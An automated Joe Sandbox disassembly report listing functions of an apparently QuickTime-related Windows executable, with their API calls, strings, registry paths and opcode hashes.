Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: Open$Value$Query
String ID: LastFileAssociationCheck$SOFTWARE\Apple Computer, Inc.\QuickTime$Version
API String ID: 990579689-1126707418
Opcode ID: 8ed9830947034a8f47c1fa5ff879d928c6191af6d7bb01204808021b8566be7f
Instruction ID: 3cfed9899516ec5b1b5702f0ae9b463e0d477308864d3a1d31b39dd3d026491e
Opcode Fuzzy Hash: 8ed9830947034a8f47c1fa5ff879d928c6191af6d7bb01204808021b8566be7f
Instruction Fuzzy Hash: 191189B1504311AFD210DF45CC85F9B7BACEF88744F104D1DF658A1181E6B5D514CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00411DE9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(mscoree.dll,00411F57,?,00418D38,00000008,00411F8E,00000000,00000001,00000000,0040F6E6,00000003), ref: 00411DEE
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00411DFE
ExitProcess.KERNEL32 ref: 00411E12

Strings

CorExitProcess, xrefs: 00411DF8
mscoree.dll, xrefs: 00411DE9

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: AddressExitHandleModuleProcProcess
String ID: CorExitProcess$mscoree.dll
API String ID: 75539706-1276376045
Opcode ID: 9d1d8c5b2520e74f197ad7a0e72af17ebd6a96581cdb2a76d29c4bd611766fd4
Instruction ID: 398921a84462ec8405e32840e584835c7ad0df6accc8cbdf603a9f39477b612e
Opcode Fuzzy Hash: 9d1d8c5b2520e74f197ad7a0e72af17ebd6a96581cdb2a76d29c4bd611766fd4
Instruction Fuzzy Hash: C6D0C930740309ABEA002BB1AD09A9B3E66AF50B42714843DF801D11B4CF38CD809A2D

Uniqueness

Uniqueness Score: -1.00%

Function 00413678 Relevance: 7.7, APIs: 5, Instructions: 184COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,?,0040F775,?), ref: 0041372B
InterlockedExchange.KERNEL32(0041C688,00000001), ref: 004137A9
InterlockedExchange.KERNEL32(0041C688,00000000), ref: 0041380E
InterlockedExchange.KERNEL32(0041C688,00000001), ref: 00413832
InterlockedExchange.KERNEL32(0041C688,00000000), ref: 00413892

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: ExchangeInterlocked$QueryVirtual
String ID:
API String ID: 2947987494-0
Opcode ID: a78391b8406db4afa47bf0923f360ccd1230ee4a09eaac6fc63578c26213cb1d
Instruction ID: 32e0485ab0620b6aebce402c48cf8c53a03d099a62eb24bb9b9750076e2406b3
Opcode Fuzzy Hash: a78391b8406db4afa47bf0923f360ccd1230ee4a09eaac6fc63578c26213cb1d
Instruction Fuzzy Hash: 3551F170B406119FCB249F29D8C47EA73E1AB84716F25C16BE41287391D778DEC28B8C

Uniqueness

Uniqueness Score: -1.00%

Function 00412719 Relevance: 7.7, APIs: 5, Instructions: 172COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32(?), ref: 00412776
GetFileType.KERNEL32(?), ref: 00412820
GetStdHandle.KERNEL32(-000000F6), ref: 004128A1

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: FileHandleInfoStartupType
String ID:
API String ID: 2461013171-0
Opcode ID: c44cd7cdc1d38db6f9016cc3da3c9d948ae851b48b097804f3bcffa589f10950
Instruction ID: 8bd5298ff4151ad85ed7a61108ecbdbf838f8d3dfe61ec8a485ab04711b5308c
Opcode Fuzzy Hash: c44cd7cdc1d38db6f9016cc3da3c9d948ae851b48b097804f3bcffa589f10950
Instruction Fuzzy Hash: 0951F4716083418FD7109F28CA847E27BE4BB01328F15877ED5A6CB2E1D778E5A98719

Uniqueness

Uniqueness Score: -1.00%

Function 00416A44 Relevance: 7.7, APIs: 5, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f686bd55bbf59e01f5d63f197a8dc44ebd78f5bc195c1ebfc6a506c1ffcb396
Instruction ID: 39ecf9d9653a2d7fd7408342a8b021ae19a4c3f94f621b0814480ad08cc578b1
Opcode Fuzzy Hash: 8f686bd55bbf59e01f5d63f197a8dc44ebd78f5bc195c1ebfc6a506c1ffcb396
Instruction Fuzzy Hash: 4B4194B1D05235AACF20AF669C848EF7A74EB45364712813FF914E62A0D73CDD81CA9D

Uniqueness

Uniqueness Score: -1.00%

Function 00404D90 Relevance: 7.6, APIs: 5, Instructions: 60stringCOMMON

Download Yara Rule

APIs

lstrcpyA.KERNEL32(?,0041830C,?), ref: 00404DC4
SHGetSpecialFolderLocation.SHELL32(?,?,?), ref: 00404DD4
SHGetPathFromIDListA.SHELL32(?,?), ref: 00404DE8
lstrcpyA.KERNEL32(?,?), ref: 00404DF8
SHGetMalloc.SHELL32(?), ref: 00404E04

Memory Dump Source

Source File: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: lstrcpy$FolderFromListLocationMallocPathSpecial
String ID:
API String ID: 1575355788-0
Opcode ID: 388bb07c08be98f405084822d3bc46b0ca044732e09b87e024f0fdff3ef19be4
Instruction ID: 655e0b6bbfe70aacb3121f06de898258472ed81519ea0a3666e93f2fa5ac7d70
Opcode Fuzzy Hash: 388bb07c08be98f405084822d3bc46b0ca044732e09b87e024f0fdff3ef19be4
Instruction Fuzzy Hash: CE1149B2604305ABD224DF65DC85EEBB7E8EFD8710F00482DF64583250DB35E8068BA6

Uniqueness

Uniqueness Score: -1.00%

Function 00408D70 Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeA.VERSION(?,?,00000000), ref: 00408D97
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,?,00000000), ref: 00408DA6
GetFileVersionInfoA.VERSION(?,00000000,00000000,00000000), ref: 00408DB3
VerQueryValueA.VERSION(00000000,00418370,00000000,?,?,00000000,00000000,00000000), ref: 00408DCC
GlobalFree.KERNEL32(00000000), ref: 00408DF0

Memory Dump Source

Source File: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValue
String ID:
API String ID: 4245734737-0
Opcode ID: 4b260d44ccdf90bf12ab37974c1432d08da73ee967f5ebd2d1836262332f0fc8
Instruction ID: 9e883a46a54122195b84e6a620dc85730912ee685cd05245efda1f1050da35ee
Opcode Fuzzy Hash: 4b260d44ccdf90bf12ab37974c1432d08da73ee967f5ebd2d1836262332f0fc8
Instruction Fuzzy Hash: F1013C31200305ABE310AF11CD85BA777A8EF95B50F04457DBE88A72C1EF38E805C66A

Uniqueness

Uniqueness Score: -1.00%

Function 0041081E Relevance: 7.5, APIs: 5, Instructions: 37threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(0040F6E6,00000000,004129BF,0040F952,00000000,00418BD8,00000008,0040F9A9,0040F6E6,?,?,00411EC0,00000008,00418D38,00000008,00411F8E), ref: 00410820
FlsGetValue.KERNEL32(?,?,00411EC0,00000008,00418D38,00000008,00411F8E,00000000,00000001,00000000,0040F6E6,00000003), ref: 0041082E
FlsSetValue.KERNEL32(00000000,?,?,00411EC0,00000008,00418D38,00000008,00411F8E,00000000,00000001,00000000,0040F6E6,00000003), ref: 00410855
GetCurrentThreadId.KERNEL32 ref: 0041086D
SetLastError.KERNEL32(00000000,?,?,00411EC0,00000008,00418D38,00000008,00411F8E,00000000,00000001,00000000,0040F6E6,00000003), ref: 00410884

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: ErrorLastValue$CurrentThread
String ID:
API String ID: 526964173-0
Opcode ID: 23cbc493792e7cd9b2a673f75ff43cf3f4826365602e3b8babbc8afbe2c6ac2e
Instruction ID: b62ea732a1036b8aa23b94be12f5e3c40e86e9596f1c1a5021f58e5f51f8dea9
Opcode Fuzzy Hash: 23cbc493792e7cd9b2a673f75ff43cf3f4826365602e3b8babbc8afbe2c6ac2e
Instruction Fuzzy Hash: CDF06831545711ABD7302F65AC4D7D67B50EB047A1B10863EF942962B1CBB8888487DD

Uniqueness

Uniqueness Score: -1.00%

Function 0040DE10 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 151COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,RegistryCheck,00000000,Function_0000C760,?,?,?,?), ref: 0040DED5

Strings

QuickTimePlayer.exe, xrefs: 0040DE46
PictureViewer.exe, xrefs: 0040DE5B
RegistryCheck, xrefs: 0040DEA0, 0040DECE

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: HandleModule
String ID: PictureViewer.exe$QuickTimePlayer.exe$RegistryCheck
API String ID: 4139908857-2178028076
Opcode ID: afbb2ad800d0e71283d65dfaf6dae06d57a3ca4542edfaa96d30170aee667070
Instruction ID: 4d3ec79d72133f29eaea0113b65375bfebadfdc3310629349a01e503a4c54b7f
Opcode Fuzzy Hash: afbb2ad800d0e71283d65dfaf6dae06d57a3ca4542edfaa96d30170aee667070
Instruction Fuzzy Hash: 35413875D083415ADB20EB75C841BAF7BD45F94308F48897EF4C96B2C2EA389909C75A

Uniqueness

Uniqueness Score: -1.00%

Function 0040DA60 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040E1E0: RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,00000000,?,?), ref: 0040E206
Part of subcall function 0040E1E0: RegOpenKeyExA.ADVAPI32 ref: 0040E235
Part of subcall function 0040E1E0: RegOpenKeyExA.ADVAPI32(?,?,?,?,?), ref: 0040E248

RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040DABA
RegEnumKeyA.ADVAPI32(?,?,?,?), ref: 0040DAEB
RegCloseKey.ADVAPI32(?), ref: 0040DB27

Strings

SOFTWARE\Apple Computer, Inc.\QuickTime\Installed File Types\, xrefs: 0040DA82

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: Open$CloseEnumInfoQuery
String ID: SOFTWARE\Apple Computer, Inc.\QuickTime\Installed File Types\
API String ID: 2889046496-718614353
Opcode ID: eefc98456f86a8701bd26cbe64cb165aaadc8c9697cca50dcd21a7e9c4762c85
Instruction ID: dad44f61fcad05e5b8ab17e4edbf6ed03e81146cbc46cf303cbe2636986d497f
Opcode Fuzzy Hash: eefc98456f86a8701bd26cbe64cb165aaadc8c9697cca50dcd21a7e9c4762c85
Instruction Fuzzy Hash: FD217E76E00118ABCB10DF95DC81EEFBBB8EF45754F01446AF915A7241D638AA04CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040CB10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 82registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040E1E0: RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,00000000,?,?), ref: 0040E206
Part of subcall function 0040E1E0: RegOpenKeyExA.ADVAPI32 ref: 0040E235
Part of subcall function 0040E1E0: RegOpenKeyExA.ADVAPI32(?,?,?,?,?), ref: 0040E248

RegQueryValueExA.ADVAPI32(?,0041830C,00000000,?,?,?), ref: 0040CBC8
RegCloseKey.ADVAPI32(?), ref: 0040CC1E

Strings

QuickTime., xrefs: 0040CB16
iTunes., xrefs: 0040CB43

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: Open$CloseQueryValue
String ID: QuickTime.$iTunes.
API String ID: 3546245721-3934963629
Opcode ID: 15b6db4efc9e1520403a635c4a43ed8f728376e522566a8aaf69cf406b6dd786
Instruction ID: 2bf353addfb546ac83a393a2c31136543d7c65b78e481dbe7710cffd191ded0e
Opcode Fuzzy Hash: 15b6db4efc9e1520403a635c4a43ed8f728376e522566a8aaf69cf406b6dd786
Instruction Fuzzy Hash: D5318475508300DBD320CF21D985BABB7E8AFD8704F148A2DF99993291EB78D548CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0040B2B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 55windowCOMMON

Download Yara Rule

APIs

FindWindowA.USER32 ref: 0040B2E3
SHAppBarMessage.SHELL32(00000005,00000000), ref: 0040B301

Strings

$, xrefs: 0040B2F5
Shell_TrayWnd, xrefs: 0040B2D2

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: FindMessageWindow
String ID: $$Shell_TrayWnd
API String ID: 2823233367-3170019350
Opcode ID: 2304990b899207212a4794e97e11c945f5e73ec3a5c316fb1851a9635b2b8dbd
Instruction ID: 29e72ac3c32598124e831ff8110c1e1cd0b6b233ca0ab3048d32efe28ff485b2
Opcode Fuzzy Hash: 2304990b899207212a4794e97e11c945f5e73ec3a5c316fb1851a9635b2b8dbd
Instruction Fuzzy Hash: 3B110D709083019FD754CF28D98526BBAE1FB84710F64C92EE849E6284E738C945CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 0040FEB7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,0040E75E), ref: 0040FEBC
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0040FECC

Strings

IsProcessorFeaturePresent, xrefs: 0040FEC6
KERNEL32, xrefs: 0040FEB7

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: ea2e0f9c45b34e75151467de63cdef09e29b19a7c160bcd18ff61810818b112e
Instruction ID: 489428d971370250779007c645930295d2fc14d86ee28280505d5e8faaf9f355
Opcode Fuzzy Hash: ea2e0f9c45b34e75151467de63cdef09e29b19a7c160bcd18ff61810818b112e
Instruction Fuzzy Hash: FFC0123074130995DB3017B18C19B5735041B44B41F154C3AA001E0DE1EF78C04840BD

Uniqueness

Uniqueness Score: -1.00%

Function 00409CF0 Relevance: 6.1, APIs: 4, Instructions: 145libraryCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,?,000000FF), ref: 00409D65
LoadLibraryExA.KERNEL32(?,00000000,00000000), ref: 00409DC2
LoadLibraryExA.KERNEL32(?,00000000,00000000), ref: 00409E23
GetModuleHandleA.KERNEL32(00000000), ref: 00409E4C

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: LibraryLoadModule$FileHandleName
String ID:
API String ID: 427467444-0
Opcode ID: c5b42b5173501078499228b5d88371dae386a528b2a0425e7f130fda62545df8
Instruction ID: 53cdeaa985f3d35122f2234d397b49a88a5a6416e3c2715e587b4d4b19f765d4
Opcode Fuzzy Hash: c5b42b5173501078499228b5d88371dae386a528b2a0425e7f130fda62545df8
Instruction Fuzzy Hash: 88410E722803055BE330DF65DC81BB7B7E8EF44700F44483EAA96E22D2EB78E8058759

Uniqueness

Uniqueness Score: -1.00%

Function 00412322 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

___initmbctable.LIBCMT ref: 0041232F
_strlen.LIBCMT ref: 00412348
_strlen.LIBCMT ref: 00412381
_strcat.LIBCMT ref: 0041239E

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: _strlen$___initmbctable_strcat
String ID:
API String ID: 109824703-0
Opcode ID: f829b0322065c186e2c5bd566c12de97a08f4280d51c31bd78a4eca2c274d7de
Instruction ID: 6c6cb9ec1b47a6e84593d5628f301007a56280f7b2fd1fa0fc74facb0f99a852
Opcode Fuzzy Hash: f829b0322065c186e2c5bd566c12de97a08f4280d51c31bd78a4eca2c274d7de
Instruction Fuzzy Hash: 0911367244910C9AD7216F76FD805E6B789EB00324720863FE9A5D31A1DABC18E69B5C

Uniqueness

Uniqueness Score: -1.00%

Function 004158FD Relevance: 6.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

___addl.LIBCMT ref: 0041590C
___addl.LIBCMT ref: 00415920
___addl.LIBCMT ref: 00415938
___addl.LIBCMT ref: 00415950

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: ___addl
String ID:
API String ID: 2260456530-0
Opcode ID: a6d3fea94caffdbfbeec600a8d228e4f9831f0a4e76ee5ff08ec74ce47c2ef23
Instruction ID: 4fff78915e4bee52ec69ed7dc8755d897cf6157b11a3d697f44afa331e541c7b
Opcode Fuzzy Hash: a6d3fea94caffdbfbeec600a8d228e4f9831f0a4e76ee5ff08ec74ce47c2ef23
Instruction Fuzzy Hash: 29F0C272410902EFDA116B02DC01EDBB7F9FF84320B14442AFD5982131E732E8A8DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00404B20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040ED82: _strlen.LIBCMT ref: 0040ED92

RegCreateKeyExA.ADVAPI32(80000002,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 00404BE6
RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,?,?), ref: 00404C0C

Strings

Softwarh, xrefs: 00404B86

Memory Dump Source

Source File: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
